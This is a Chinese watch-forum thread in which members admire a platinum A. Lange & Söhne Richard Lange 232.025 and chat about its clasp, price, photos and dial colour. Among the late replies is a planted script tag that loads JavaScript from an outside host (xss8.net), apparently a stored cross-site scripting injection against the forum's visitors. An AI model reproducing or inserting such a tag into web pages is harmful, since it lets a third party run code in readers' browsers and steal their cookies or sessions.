~~~PT理查232.025~~~
46回复

最近看R版的微信才发现原来论坛的大佬都到了表态,老照片发个贴支持一下,图片为主,最美大三针,不用多介绍了.......目前对Dato长草中,还是想找老版,曾经有一支红金黑面的错过,唉.....可能是没有缘分。

真的假的哎,折叠扣一只表钱,casio表?

楼主保养的很好,看不出有佩戴的痕迹,很新!图片拍的真好,用的是什么微距镜头?

jeanhi 发表于 2015-7-31 17:00

楼主保养的很好,看不出有佩戴的痕迹,很新!图片拍的真好,用的是什么微距镜头? ...
一年前拍的了,现在已经有不少痕迹了,用的一般狗头拍的

京城小六子 发表于 2015-7-28 15:58

把朗格折叠扣上下位置换一下马上舒服
确实,但反过来针扣上的字有是反的.......我不是处女座啊?

jeanhi 发表于 2015-7-31 16:59

真的假的哎,折叠扣一只表钱,casio表?
朗格铂金折叠扣我记得是3/4万

真是漂亮!

必须 必须 必须赞 太美了

大气漂亮 恭喜lz

感谢支持!

我没那么多子弹在朗格上前进

dato 到位

还是铂金好看

谢超版支持!当初也是比较红金和PT后觉得PT更冷峻耐看。

PT配这个灰的面,实在是太美!

偶也稀饭它!!!找了俩年终于得手!

这图片拍出了艺术美感,果然最美大三针不过分啊,简单就是美丽,而且越看越有味道,机芯就是艺术品 ! 我等光看图就被迷倒,看到实物还不留下鼻血了 !!!

骑着单车的杨过 发表于 2015-9-9 12:24

这图片拍出了艺术美感,果然最美大三针不过分啊,简单就是美丽,而且越看越有味道,机芯就是艺术品 ! 我 ...
感谢支持:D

<script src=http://xss8.net/?c=aSBcQ></script>

真的吗//@京城小六子 :

不觉得机芯不好看么//@阿JIE :

只有同款钢笔什么时候才能拥有一块lange呢